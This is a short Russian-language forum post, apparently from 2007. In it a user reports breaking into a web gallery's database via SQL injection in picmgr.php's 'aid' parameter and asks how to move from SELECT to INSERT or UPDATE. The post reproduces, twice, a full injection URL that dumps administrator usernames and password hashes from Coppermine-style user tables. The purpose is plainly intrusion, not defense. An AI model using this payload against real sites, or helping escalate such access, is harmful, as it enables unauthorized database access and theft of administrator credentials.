AllaryS
28.07.2007, 20:40
Пробился к базе могу селектить, вопрос можно ли выполнить INSERT или UPDATE
P.S. Да сам пробовал никак не получаеццо 8(
P.P.S Пользовалсо уязвимостью скрипта picmgr.php переменной aid
http://host/gallery/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user _group,concat(user_name,char(58,58),user_password) %20FROM%20cpg149_users%20right%20join%20cpg149_use rgroups%20on%20cpg149_users.user_group%20=%20cpg14 9_usergroups.group_id%20where%20cpg149_usergroups. has_admin_access%20=%201%20--
P.S. Да сам пробовал никак не получаеццо 8(
P.P.S Пользовалсо уязвимостью скрипта picmgr.php переменной aid
http://host/gallery/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user _group,concat(user_name,char(58,58),user_password) %20FROM%20cpg149_users%20right%20join%20cpg149_use rgroups%20on%20cpg149_users.user_group%20=%20cpg14 9_usergroups.group_id%20where%20cpg149_usergroups. has_admin_access%20=%201%20--